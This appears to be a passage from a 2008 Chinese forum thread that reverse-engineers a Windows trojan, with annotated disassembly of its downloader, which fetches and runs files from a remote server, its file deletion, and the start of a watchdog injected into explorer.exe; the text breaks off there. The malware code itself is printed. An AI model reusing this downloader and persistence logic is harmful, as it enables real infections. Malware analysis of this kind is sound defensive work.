00401CF7 E8 A6530000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.url").
00401CFC 59             POP ECX
00401CFD 59             POP ECX
00401CFE F7D8          NEG EAX
00401D00 1BC0          SBB EAX,EAX
00401D02 40             INC EAX
00401D03 8885 5CF4FFFF MOV BYTE PTR SS:[EBP-BA4],AL
00401D09 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC]
00401D0F E8 C2020000    CALL waccs.00401FD6                   ; 清除内存数据.
00401D14 0FB685 5CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-BA4]
00401D1B 85C0          TEST EAX,EAX
00401D1D 0F84 70010000 JE waccs.00401E93                      ; 判断是否该执行"msn.url"命令.
00401D23 68 20040000    PUSH 420
00401D28 6A 00          PUSH 0
00401D2A 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0]
00401D30 50             PUSH EAX
00401D31 E8 04530000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00401D36 83C4 0C       ADD ESP,0C
00401D39 80A5 10F5FFFF 0>AND BYTE PTR SS:[EBP-AF0],0
00401D40 68 04010000    PUSH 104
00401D45 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401D48 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198]
00401D4F 8D85 1DF8FFFF LEA EAX,DWORD PTR SS:[EBP-7E3]
00401D55 50             PUSH EAX
00401D56 E8 41530000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401D5B 83C4 0C       ADD ESP,0C
00401D5E 68 04010000    PUSH 104
00401D63 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401D66 FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-194]
00401D6D 8D85 11F5FFFF LEA EAX,DWORD PTR SS:[EBP-AEF]
00401D73 50             PUSH EAX
00401D74 E8 23530000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401D79 83C4 0C       ADD ESP,0C
00401D7C 68 04010000    PUSH 104
00401D81 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401D84 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-190]
00401D8B 8D85 15F6FFFF LEA EAX,DWORD PTR SS:[EBP-9EB]
00401D91 50             PUSH EAX
00401D92 E8 05530000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401D97 83C4 0C       ADD ESP,0C
00401D9A 68 04010000    PUSH 104
00401D9F 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401DA2 FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-18C]
00401DA9 8D85 19F7FFFF LEA EAX,DWORD PTR SS:[EBP-8E7]
00401DAF 50             PUSH EAX
00401DB0 E8 E7520000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401DB5 83C4 0C       ADD ESP,0C
00401DB8 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401DBB 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-188],0
00401DC3 74 41          JE SHORT waccs.00401E06
00401DC5 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401DC8 83BC85 7CFEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-184],0
00401DD0 74 34          JE SHORT waccs.00401E06
00401DD2 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401DD5 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-188]
00401DDC E8 AF520000    CALL waccs.00407090                   ; JMP 到 msvcrt.atoi
00401DE1 59             POP ECX
00401DE2 8985 24F9FFFF MOV DWORD PTR SS:[EBP-6DC],EAX
00401DE8 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401DEB FFB485 7CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-184]
00401DF2 E8 99520000    CALL waccs.00407090                   ; JMP 到 msvcrt.atoi
00401DF7 59             POP ECX
00401DF8 69C0 60EA0000 IMUL EAX,EAX,0EA60
00401DFE 8985 28F9FFFF MOV DWORD PTR SS:[EBP-6D8],EAX
00401E04 EB 14          JMP SHORT waccs.00401E1A
00401E06 C785 24F9FFFF 0>MOV DWORD PTR SS:[EBP-6DC],1
00401E10 C785 28F9FFFF F>MOV DWORD PTR SS:[EBP-6D8],0FA
00401E1A 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401E1D 8985 2CF9FFFF MOV DWORD PTR SS:[EBP-6D4],EAX
00401E23 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401E26 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0
00401E2D 74 11          JE SHORT waccs.00401E40
00401E2F 6A 00          PUSH 0
00401E31 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401E34 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110]
00401E3A FF15 70804000 CALL DWORD PTR DS:[408070]             ; kernel32.TerminateThread(结束线程).
00401E40 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0]
00401E46 50             PUSH EAX
00401E47 6A 00          PUSH 0
00401E49 68 FE4C4000    PUSH waccs.00404CFE
00401E4E E8 43520000    CALL waccs.00407096                   ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00404CFE).(线程功能：建立连接，访问远程网站信息，下载和删除指定文件等操作).
00401E53 83C4 0C       ADD ESP,0C
00401E56 8B4D 08       MOV ECX,DWORD PTR SS:[EBP+8]
00401E59 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX
00401E5F 83A5 0CF5FFFF 0>AND DWORD PTR SS:[EBP-AF4],0
00401E66 EB 0D          JMP SHORT waccs.00401E75
00401E68 8B85 0CF5FFFF MOV EAX,DWORD PTR SS:[EBP-AF4]
00401E6E 40             INC EAX
00401E6F 8985 0CF5FFFF MOV DWORD PTR SS:[EBP-AF4],EAX
00401E75 0FB685 10F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF0]
00401E7C 85C0          TEST EAX,EAX
00401E7E 75 13          JNZ SHORT waccs.00401E93
00401E80 83BD 0CF5FFFF 5>CMP DWORD PTR SS:[EBP-AF4],50
00401E87 7D 0A          JGE SHORT waccs.00401E93
00401E89 6A 19          PUSH 19
00401E8B FF15 6C804000 CALL DWORD PTR DS:[40806C]             ; kernel32.Sleep(等待).
00401E91 ^ EB D5          JMP SHORT waccs.00401E68
00401E93 5F             POP EDI
00401E94 C9             LEAVE
00401E95 C3             RETN                                  ; 返回.

下载骇客指定远程服务器站点的其它程序，并自动调用运行：
00403A14 55             PUSH EBP
00403A15 8BEC          MOV EBP,ESP
00403A17 81EC 6C030000 SUB ESP,36C
00403A1D 56             PUSH ESI
00403A1E 57             PUSH EDI
00403A1F 8B75 08       MOV ESI,DWORD PTR SS:[EBP+8]
00403A22 6A 43          PUSH 43
00403A24 59             POP ECX
00403A25 8DBD F0FDFFFF LEA EDI,DWORD PTR SS:[EBP-210]
00403A2B F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00403A2D 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00403A30 8985 E8FCFFFF MOV DWORD PTR SS:[EBP-318],EAX
00403A36 8B85 E8FCFFFF MOV EAX,DWORD PTR SS:[EBP-318]
00403A3C C600 01       MOV BYTE PTR DS:[EAX],1
00403A3F FF15 68804000 CALL DWORD PTR DS:[408068]             ; kernel32.GetTickCount
00403A45 50             PUSH EAX
00403A46 E8 01360000    CALL waccs.0040704C                   ; JMP 到 msvcrt.srand
00403A4B 59             POP ECX
00403A4C 68 04010000    PUSH 104
00403A51 6A 00          PUSH 0
00403A53 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403A59 50             PUSH EAX
00403A5A E8 DB350000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00403A5F 83C4 0C       ADD ESP,0C
00403A62 68 04010000    PUSH 104
00403A67 6A 00          PUSH 0
00403A69 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314]
00403A6F 50             PUSH EAX
00403A70 E8 C5350000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00403A75 83C4 0C       ADD ESP,0C
00403A78 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314]
00403A7E 50             PUSH EAX
00403A7F 68 04010000    PUSH 104
00403A84 FF15 A4804000 CALL DWORD PTR DS:[4080A4]             ; kernel32.GetTempPathA
00403A8A E8 B7350000    CALL waccs.00407046                   ; JMP 到 msvcrt.rand
00403A8F 99             CDQ
00403A90 6A 09          PUSH 9
00403A92 59             POP ECX
00403A93 F7F9          IDIV ECX
00403A95 52             PUSH EDX
00403A96 E8 AB350000    CALL waccs.00407046                   ; JMP 到 msvcrt.rand
00403A9B 99             CDQ
00403A9C 6A 09          PUSH 9
00403A9E 59             POP ECX
00403A9F F7F9          IDIV ECX
00403AA1 52             PUSH EDX
00403AA2 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314]
00403AA8 50             PUSH EAX
00403AA9 68 D95B0021    PUSH 21005BD9
00403AAE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328]
00403AB4 E8 6C090000    CALL waccs.00404425
00403AB9 50             PUSH EAX
00403ABA 68 04010000    PUSH 104
00403ABF 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403AC5 50             PUSH EAX
00403AC6 E8 75350000    CALL waccs.00407040                   ; JMP 到 msvcrt._snprintf
00403ACB 83C4 18       ADD ESP,18
00403ACE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328]
00403AD4 E8 9DE5FFFF    CALL waccs.00402076
00403AD9 6A 00          PUSH 0
00403ADB 6A 00          PUSH 0
00403ADD 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403AE3 50             PUSH EAX
00403AE4 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F]
00403AEA 50             PUSH EAX
00403AEB 6A 00          PUSH 0
00403AED E8 C2360000    CALL waccs.004071B4                   ; JMP 到 urlmon.URLDownloadToFileA
00403AF2 8985 E4FCFFFF MOV DWORD PTR SS:[EBP-31C],EAX
00403AF8 83BD E4FCFFFF 0>CMP DWORD PTR SS:[EBP-31C],0
00403AFF 75 6A          JNZ SHORT waccs.00403B6B
00403B01 6A 00          PUSH 0
00403B03 6A 00          PUSH 0
00403B05 6A 00          PUSH 0
00403B07 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403B0D 50             PUSH EAX
00403B0E 68 AC9D4000    PUSH waccs.00409DAC                   ; ASCII "open"
00403B13 6A 00          PUSH 0
00403B15 FF15 74814000 CALL DWORD PTR DS:[408174]             ; SHELL32.ShellExecuteA
00403B1B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403B21 50             PUSH EAX
00403B22 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F]
00403B28 50             PUSH EAX
00403B29 68 B49D4000    PUSH waccs.00409DB4
00403B2E 68 B89D4000    PUSH waccs.00409DB8
00403B33 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108]
00403B39 05 D3000000    ADD EAX,0D3
00403B3E 50             PUSH EAX
00403B3F 68 D32B4F0A    PUSH 0A4F2BD3
00403B44 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C]
00403B4A E8 36090000    CALL waccs.00404485
00403B4F 50             PUSH EAX
00403B50 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108]
00403B56 E8 A5D4FFFF    CALL waccs.00401000
00403B5B 83C4 1C       ADD ESP,1C
00403B5E 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C]
00403B64 E8 FC060000    CALL waccs.00404265
00403B69 EB 40          JMP SHORT waccs.00403BAB
00403B6B 68 E09D4000    PUSH waccs.00409DE0
00403B70 68 E49D4000    PUSH waccs.00409DE4
00403B75 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108]
00403B7B 05 D3000000    ADD EAX,0D3
00403B80 50             PUSH EAX
00403B81 68 4AF075C1    PUSH C175F04A
00403B86 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C]
00403B8C E8 54090000    CALL waccs.004044E5
00403B91 50             PUSH EAX
00403B92 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108]
00403B98 E8 63D4FFFF    CALL waccs.00401000
00403B9D 83C4 14       ADD ESP,14
00403BA0 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C]
00403BA6 E8 E2060000    CALL waccs.0040428D
00403BAB 5F             POP EDI
00403BAC 5E             POP ESI
00403BAD C9             LEAVE
00403BAE C3             RETN                                  ; 返回.

Simen.Resh@d · 发表于 2008-6-15 12:57:23

建立连接，访问远程网站信息，下载和删除指定文件等操作：
00404CFE 55             PUSH EBP
00404CFF 8BEC          MOV EBP,ESP
00404D01 B8 5C190000    MOV EAX,195C
00404D06 E8 55230000    CALL waccs.00407060
00404D0B 56             PUSH ESI
00404D0C 57             PUSH EDI
00404D0D 8B75 08       MOV ESI,DWORD PTR SS:[EBP+8]
00404D10 B9 08010000    MOV ECX,108
00404D15 8DBD 3CE8FFFF LEA EDI,DWORD PTR SS:[EBP-17C4]
00404D1B F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00404D1D 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00404D20 8985 28E8FFFF MOV DWORD PTR SS:[EBP-17D8],EAX
00404D26 8B85 28E8FFFF MOV EAX,DWORD PTR SS:[EBP-17D8]
00404D2C C600 01       MOV BYTE PTR DS:[EAX],1
00404D2F 83A5 68EEFFFF 0>AND DWORD PTR SS:[EBP-1198],0
00404D36 6A 63          PUSH 63
00404D38 59             POP ECX
00404D39 33C0          XOR EAX,EAX
00404D3B 8DBD 6CEEFFFF LEA EDI,DWORD PTR SS:[EBP-1194]
00404D41 F3:AB          REP STOS DWORD PTR ES:[EDI]
00404D43 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004]
00404D49 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX
00404D4F 68 04010000    PUSH 104
00404D54 6A 00          PUSH 0
00404D56 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404D5C 50             PUSH EAX
00404D5D E8 D8220000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00404D62 83C4 0C       ADD ESP,0C
00404D65 68 04010000    PUSH 104
00404D6A 6A 00          PUSH 0
00404D6C 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404D72 50             PUSH EAX
00404D73 E8 C2220000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00404D78 83C4 0C       ADD ESP,0C
00404D7B 68 04010000    PUSH 104
00404D80 6A 00          PUSH 0
00404D82 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404D88 50             PUSH EAX
00404D89 E8 AC220000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00404D8E 83C4 0C       ADD ESP,0C
00404D91 68 90010000    PUSH 190
00404D96 6A 00          PUSH 0
00404D98 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198]
00404D9E 50             PUSH EAX
00404D9F E8 96220000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00404DA4 83C4 0C       ADD ESP,0C
00404DA7 83A5 20E8FFFF 0>AND DWORD PTR SS:[EBP-17E0],0
00404DAE 83A5 30E8FFFF 0>AND DWORD PTR SS:[EBP-17D0],0
00404DB5 83A5 F8EFFFFF 0>AND DWORD PTR SS:[EBP-1008],0
00404DBC 6A 00          PUSH 0
00404DBE 6A 00          PUSH 0
00404DC0 6A 00          PUSH 0
00404DC2 6A 00          PUSH 0
00404DC4 68 40084B19    PUSH 194B0840
00404DC9 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904]
00404DCF E8 A5040000    CALL waccs.00405279
00404DD4 50             PUSH EAX
00404DD5 FF15 B4814000 CALL DWORD PTR DS:[4081B4]             ; WININET.InternetOpenA
00404DDB 8985 20E8FFFF MOV DWORD PTR SS:[EBP-17E0],EAX
00404DE1 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904]
00404DE7 E8 C2D1FFFF    CALL waccs.00401FAE
00404DEC 83BD 20E8FFFF 0>CMP DWORD PTR SS:[EBP-17E0],0
00404DF3 75 05          JNZ SHORT waccs.00404DFA
00404DF5 E8 AE220000    CALL waccs.004070A8                   ; JMP 到 msvcrt._endthread
00404DFA 6A 00          PUSH 0
00404DFC 6A 00          PUSH 0
00404DFE 6A 00          PUSH 0
00404E00 6A 00          PUSH 0
00404E02 8D85 49EBFFFF LEA EAX,DWORD PTR SS:[EBP-14B7]
00404E08 50             PUSH EAX
00404E09 FFB5 20E8FFFF PUSH DWORD PTR SS:[EBP-17E0]
00404E0F FF15 B8814000 CALL DWORD PTR DS:[4081B8]             ; WININET.InternetOpenUrlA
00404E15 8985 30E8FFFF MOV DWORD PTR SS:[EBP-17D0],EAX
00404E1B 83BD 30E8FFFF 0>CMP DWORD PTR SS:[EBP-17D0],0
00404E22 75 05          JNZ SHORT waccs.00404E29
00404E24 E8 7F220000    CALL waccs.004070A8                   ; JMP 到 msvcrt._endthread
00404E29 8D85 F8EFFFFF LEA EAX,DWORD PTR SS:[EBP-1008]
00404E2F 50             PUSH EAX
00404E30 68 00100000    PUSH 1000
00404E35 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004]
00404E3B 50             PUSH EAX
00404E3C FFB5 30E8FFFF PUSH DWORD PTR SS:[EBP-17D0]
00404E42 FF15 BC814000 CALL DWORD PTR DS:[4081BC]             ; WININET.InternetReadFile
00404E48 85C0          TEST EAX,EAX
00404E4A 75 05          JNZ SHORT waccs.00404E51
00404E4C E8 57220000    CALL waccs.004070A8                   ; JMP 到 msvcrt._endthread
00404E51 83A5 18E7FFFF 0>AND DWORD PTR SS:[EBP-18E8],0
00404E58 68 DA43FADE    PUSH DEFA43DA
00404E5D 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C]
00404E63 E8 71040000    CALL waccs.004052D9
00404E68 50             PUSH EAX
00404E69 FFB5 60EDFFFF PUSH DWORD PTR SS:[EBP-12A0]
00404E6F E8 DE210000    CALL waccs.00407052                   ; JMP 到 msvcrt.strstr
00404E74 59             POP ECX
00404E75 59             POP ECX
00404E76 8985 34E8FFFF MOV DWORD PTR SS:[EBP-17CC],EAX
00404E7C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC]
00404E82 8985 F8E6FFFF MOV DWORD PTR SS:[EBP-1908],EAX
00404E88 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C]
00404E8E E8 36030000    CALL waccs.004051C9
00404E93 83BD F8E6FFFF 0>CMP DWORD PTR SS:[EBP-1908],0
00404E9A 74 38          JE SHORT waccs.00404ED4
00404E9C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC]
00404EA2 8020 00       AND BYTE PTR DS:[EAX],0
00404EA5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8]
00404EAB 8B8D 60EDFFFF MOV ECX,DWORD PTR SS:[EBP-12A0]
00404EB1 898C85 68EEFFFF MOV DWORD PTR SS:[EBP+EAX*4-1198],ECX
00404EB8 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC]
00404EBE 40             INC EAX
00404EBF 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX
00404EC5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8]
00404ECB 40             INC EAX
00404ECC 8985 18E7FFFF MOV DWORD PTR SS:[EBP-18E8],EAX
00404ED2 ^ EB 84          JMP SHORT waccs.00404E58
00404ED4 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404EDA 50             PUSH EAX
00404EDB 68 04010000    PUSH 104
00404EE0 FF15 A4804000 CALL DWORD PTR DS:[4080A4]             ; kernel32.GetTempPathA
00404EE6 8D85 45EAFFFF LEA EAX,DWORD PTR SS:[EBP-15BB]
00404EEC 50             PUSH EAX
00404EED 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404EF3 50             PUSH EAX
00404EF4 68 23B863A8    PUSH A863B823
00404EF9 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914]
00404EFF E8 35040000    CALL waccs.00405339
00404F04 50             PUSH EAX
00404F05 68 04010000    PUSH 104
00404F0A 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404F10 50             PUSH EAX
00404F11 E8 2A210000    CALL waccs.00407040                   ; JMP 到 msvcrt._snprintf
00404F16 83C4 14       ADD ESP,14
00404F19 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914]
00404F1F E8 02D1FFFF    CALL waccs.00402026
00404F24 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404F2A 50             PUSH EAX
00404F2B E8 BFF0FFFF    CALL waccs.00403FEF
00404F30 59             POP ECX
00404F31 0FB6C0       MOVZX EAX,AL
00404F34 85C0          TEST EAX,EAX
00404F36 74 0D          JE SHORT waccs.00404F45
00404F38 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404F3E 50             PUSH EAX
00404F3F FF15 E8804000 CALL DWORD PTR DS:[4080E8]             ; kernel32.DeleteFileA
00404F45 0FBE85 3DE8FFFF MOVSX EAX,BYTE PTR SS:[EBP-17C3]
00404F4C 85C0          TEST EAX,EAX
00404F4E 0F84 B5000000 JE waccs.00405009
00404F54 FF15 68804000 CALL DWORD PTR DS:[408068]             ; kernel32.GetTickCount
00404F5A 50             PUSH EAX
00404F5B E8 EC200000    CALL waccs.0040704C                   ; JMP 到 msvcrt.srand
00404F60 59             POP ECX
00404F61 E8 E0200000    CALL waccs.00407046                   ; JMP 到 msvcrt.rand
00404F66 99             CDQ
00404F67 6A 09          PUSH 9
00404F69 59             POP ECX
00404F6A F7F9          IDIV ECX
00404F6C 52             PUSH EDX
00404F6D E8 D4200000    CALL waccs.00407046                   ; JMP 到 msvcrt.rand
00404F72 99             CDQ
00404F73 6A 09          PUSH 9
00404F75 59             POP ECX
00404F76 F7F9          IDIV ECX
00404F78 52             PUSH EDX
00404F79 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404F7F 50             PUSH EAX
00404F80 68 EADFCD01    PUSH 1CDDFEA
00404F85 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920]
00404F8B E8 09040000    CALL waccs.00405399
00404F90 50             PUSH EAX
00404F91 68 04010000    PUSH 104
00404F96 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404F9C 50             PUSH EAX
00404F9D E8 9E200000    CALL waccs.00407040                   ; JMP 到 msvcrt._snprintf
00404FA2 83C4 18       ADD ESP,18
00404FA5 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920]
00404FAB E8 C6D0FFFF    CALL waccs.00402076
00404FB0 6A 00          PUSH 0
00404FB2 6A 00          PUSH 0
00404FB4 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404FBA 50             PUSH EAX
00404FBB 8D85 3DE8FFFF LEA EAX,DWORD PTR SS:[EBP-17C3]
00404FC1 50             PUSH EAX
00404FC2 6A 00          PUSH 0
00404FC4 E8 EB210000    CALL waccs.004071B4                   ; JMP 到 urlmon.URLDownloadToFileA
00404FC9 8985 24E8FFFF MOV DWORD PTR SS:[EBP-17DC],EAX
00404FCF 83BD 24E8FFFF 0>CMP DWORD PTR SS:[EBP-17DC],0
00404FD6 74 05          JE SHORT waccs.00404FDD
00404FD8 E8 CB200000    CALL waccs.004070A8                   ; JMP 到 msvcrt._endthread
00404FDD 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF]
00404FE3 50             PUSH EAX
00404FE4 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404FEA 50             PUSH EAX
00404FEB 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404FF1 50             PUSH EAX
00404FF2 E8 181B0000    CALL waccs.00406B0F
00404FF7 83C4 0C       ADD ESP,0C
00404FFA 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00405000 50             PUSH EAX
00405001 FF15 E8804000 CALL DWORD PTR DS:[4080E8]             ; kernel32.DeleteFileA
00405007 EB 38          JMP SHORT waccs.00405041
00405009 68 04010000    PUSH 104
0040500E 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00405014 50             PUSH EAX
00405015 6A 00          PUSH 0
00405017 FF15 9C804000 CALL DWORD PTR DS:[40809C]             ; kernel32.GetModuleHandleA
0040501D 50             PUSH EAX
0040501E FF15 98804000 CALL DWORD PTR DS:[408098]             ; kernel32.GetModuleFileNameA
00405024 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF]
0040502A 50             PUSH EAX
0040502B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00405031 50             PUSH EAX
00405032 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00405038 50             PUSH EAX
00405039 E8 D11A0000    CALL waccs.00406B0F
0040503E 83C4 0C       ADD ESP,0C
00405041 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00405047 50             PUSH EAX
00405048 E8 A2EFFFFF    CALL waccs.00403FEF
0040504D 59             POP ECX
0040504E 0FB6C0       MOVZX EAX,AL
00405051 85C0          TEST EAX,EAX
00405053 75 05          JNZ SHORT waccs.0040505A
00405055 E8 4E200000    CALL waccs.004070A8                   ; JMP 到 msvcrt._endthread
0040505A FF15 68804000 CALL DWORD PTR DS:[408068]             ; kernel32.GetTickCount
00405060 8985 38E8FFFF MOV DWORD PTR SS:[EBP-17C8],EAX
00405066 8B85 50ECFFFF MOV EAX,DWORD PTR SS:[EBP-13B0]
0040506C 8945 FC       MOV DWORD PTR SS:[EBP-4],EAX
0040506F EB 07          JMP SHORT waccs.00405078
00405071 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00405074 48             DEC EAX
00405075 8945 FC       MOV DWORD PTR SS:[EBP-4],EAX
00405078 837D FC 00    CMP DWORD PTR SS:[EBP-4],0
0040507C 7E 38          JLE SHORT waccs.004050B6
0040507E FFB5 18E7FFFF PUSH DWORD PTR SS:[EBP-18E8]
00405084 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198]
0040508A 50             PUSH EAX
0040508B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00405091 50             PUSH EAX
00405092 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8]
00405098 E8 ECF8FFFF    CALL waccs.00404989
0040509D 83C4 10       ADD ESP,10
004050A0 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
004050A3 48             DEC EAX
004050A4 85C0          TEST EAX,EAX
004050A6 7E 0C          JLE SHORT waccs.004050B4
004050A8 FFB5 54ECFFFF PUSH DWORD PTR SS:[EBP-13AC]
004050AE FF15 6C804000 CALL DWORD PTR DS:[40806C]             ; kernel32.Sleep
004050B4 ^ EB BB          JMP SHORT waccs.00405071
004050B6 FF15 68804000 CALL DWORD PTR DS:[408068]             ; kernel32.GetTickCount
004050BC 8985 2CE8FFFF MOV DWORD PTR SS:[EBP-17D4],EAX
004050C2 8B85 2CE8FFFF MOV EAX,DWORD PTR SS:[EBP-17D4]
004050C8 2B85 38E8FFFF SUB EAX,DWORD PTR SS:[EBP-17C8]
004050CE 99             CDQ
004050CF B9 60EA0000    MOV ECX,0EA60
004050D4 F7F9          IDIV ECX
004050D6 50             PUSH EAX
004050D7 FFB5 50ECFFFF PUSH DWORD PTR SS:[EBP-13B0]
004050DD 68 449F4000    PUSH waccs.00409F44
004050E2 68 489F4000    PUSH waccs.00409F48
004050E7 8B85 58ECFFFF MOV EAX,DWORD PTR SS:[EBP-13A8]
004050ED 05 D3000000    ADD EAX,0D3
004050F2 50             PUSH EAX
004050F3 68 26E784BB    PUSH BB84E726
004050F8 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C]
004050FE E8 F6020000    CALL waccs.004053F9
00405103 50             PUSH EAX
00405104 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8]
0040510A E8 F1BEFFFF    CALL waccs.00401000
0040510F 83C4 1C       ADD ESP,1C
00405112 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C]
00405118 E8 D4000000    CALL waccs.004051F1
0040511D E8 861F0000    CALL waccs.004070A8                   ; JMP 到 msvcrt._endthread
00405122 5F             POP EDI
00405123 5E             POP ESI
00405124 C9             LEAVE
00405125 C3             RETN                                  ; 返回.
----------------------------------------------------------------------------------------------------

Simen.Resh@d · 发表于 2008-6-15 12:57:50

----------------------------------------------------------------------------------------------------
3、对病毒注入到系统桌面程序“explorer.exe”进程中的恶意代码进行分析：

注入的代码段：
[进程守护功能：循环执行检测代码，根据互斥体名称判断病毒主程序是否在运行，如果发现病毒主程序互斥体名称不存在(进程被关闭)，则马上重新调用病毒程序启动运行.]
01A50000 55             PUSH EBP                               ; 注入代码的入口.
01A50001 8BEC          MOV EBP,ESP
01A50003 83EC 08       SUB ESP,8
01A50006 6A 00          PUSH 0                                  ; /hTemplateFile = NULL
